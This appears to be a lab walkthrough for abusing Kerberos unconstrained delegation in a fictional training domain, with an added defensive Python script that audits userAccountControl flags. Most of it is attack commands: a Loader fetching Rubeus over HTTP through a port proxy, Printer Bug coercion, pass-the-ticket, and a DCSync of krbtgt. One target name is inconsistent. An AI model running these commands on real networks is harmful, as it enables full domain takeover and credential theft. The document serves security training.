# Unconstrained Delegation

#### How Unconstrained Delegation Works

In an Active Directory environment, **delegation** allows one service (or server) to act on behalf of a user to access other resources, enabling scenarios where a user authenticates to a service, and that service can then use the user's credentials to authenticate to other services.

With **unconstrained delegation**, the domain trusts the service (or server) completely, allowing it to impersonate any user that authenticates to it. When a user authenticates to a service configured with unconstrained delegation, their **Kerberos Ticket-Granting Ticket (TGT)** is stored in memory on the service. This means the service can impersonate the user at will for any resource across the domain by using the TGT.

```
c:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

```
. C:\AD\Tools\PowerView.ps1
```

```
Get-DomainComputer -Unconstrained | select -ExpandProperty name
```
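PowerView's `-Unconstrained` switch above is an LDAP bit-and filter on the `userAccountControl` attribute. The following added example (not code from the original page or from PowerView) performs that check offline over a constructed account export, so a defender can audit which non-DC hosts carry the flag and which privileged accounts still lack the "sensitive and cannot be delegated" protection; the account list and its values are constructed.

```python
"""Audit an AD export for unconstrained delegation via the userAccountControl bitmask."""

# userAccountControl bits (ADS_USER_FLAG_ENUM). PowerView's -Unconstrained switch is the
# LDAP filter (userAccountControl:1.2.840.113556.1.4.803:=524288), i.e. a bit-AND
# against TRUSTED_FOR_DELEGATION (524288 == 0x80000).
WORKSTATION_TRUST_ACCOUNT = 0x1000
SERVER_TRUST_ACCOUNT = 0x2000       # set on domain controllers
TRUSTED_FOR_DELEGATION = 0x80000    # unconstrained delegation
NOT_DELEGATED = 0x100000            # "account is sensitive and cannot be delegated"

# Constructed sample shaped like an LDAP export; not data taken from the page's lab.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DCORP-DC$", "userAccountControl": 0x82000},
    {"sAMAccountName": "DCORP-APPSRV$", "userAccountControl": 0x81000},
    {"sAMAccountName": "DCORP-ADMINSRV$", "userAccountControl": 0x1000},
    {"sAMAccountName": "svc_legacy", "userAccountControl": 0x80200},
    {"sAMAccountName": "Administrator", "userAccountControl": 0x200},
    {"sAMAccountName": "backupadmin", "userAccountControl": 0x100200},
]


def has_flag(uac: int, flag: int) -> bool:
    return uac & flag == flag


def unconstrained_delegation(accounts, include_dcs=False):
    """Names of accounts trusted for unconstrained delegation.

    Domain controllers carry TRUSTED_FOR_DELEGATION by design, so they are
    excluded unless include_dcs is set; every other hit is a host that will
    cache the TGT of any user who authenticates to it.
    """
    hits = []
    for acct in accounts:
        uac = acct["userAccountControl"]
        if not has_flag(uac, TRUSTED_FOR_DELEGATION):
            continue
        if has_flag(uac, SERVER_TRUST_ACCOUNT) and not include_dcs:
            continue
        hits.append(acct["sAMAccountName"])
    return hits


def delegatable_privileged(accounts, privileged):
    """Privileged accounts whose TGT could still be cached by such a host.

    NOT_DELEGATED stops a TGT from being forwarded; Protected Users group
    membership has the same effect but is not part of this export.
    """
    by_name = {a["sAMAccountName"]: a["userAccountControl"] for a in accounts}
    return [n for n in privileged if n in by_name and not has_flag(by_name[n], NOT_DELEGATED)]
```

Accounts returned by `unconstrained_delegation` are candidates for moving to constrained or resource-based delegation; accounts returned by `delegatable_privileged` are candidates for the NOT_DELEGATED flag or the Protected Users group.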

Since the prerequisite for elevation using unconstrained delegation is having admin access to the machine, we need to compromise a user who has local admin access on dcorp-appsrv. Recall that we extracted the secrets of appadmin, srvadmin and websvc from dcorp-adminsrv. Let's check whether any of them has local admin privileges on dcorp-appsrv.

First, we will try with appadmin. Run the below command from an elevated command prompt:

```
c:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
```

```
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
```

```
Find-PSRemotingLocalAdminAccess -Domain dollarcorp.moneycorp.local
```

Sweet! We can now use multiple methods to copy Rubeus to dcorp-appsrv and abuse the Printer Bug.

#### Printer Bug - Execute Rubeus using Loader and winrs

Run the below command from the process running as appadmin:

```
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-appsrv\C$\Users\Public\Loader.exe /Y
```

```
winrs -r:dcorp-appsrv cmd
```

```
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.X
```

```
c:\Users\Public\Loader.exe -path http://127.0.0.1:8080/Rubeus.exe monitor /targetuser:MCORP-DC$ /interval:5 /nowrap
```

On the student VM, use MS-RPRN to force authentication from dcorp-dc$ to dcorp-appsrv:

```
C:\AD\Tools\MS-RPRN.exe \\dcorp-dc.dollarcorp.moneycorp.local \\dcorp-appsrv.dollarcorp.moneycorp.local
```

Copy the base64-encoded ticket captured by Rubeus and use it with Rubeus on the student VM. Run the below command from an elevated shell, since the SafetyKatz command that we will use for DCSync needs to be run from an elevated process:

```
C:\AD\Tools\Rubeus.exe -ptt /ticket:doIFx...
```

Now, we can run DCSync from this process:

```
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"
```
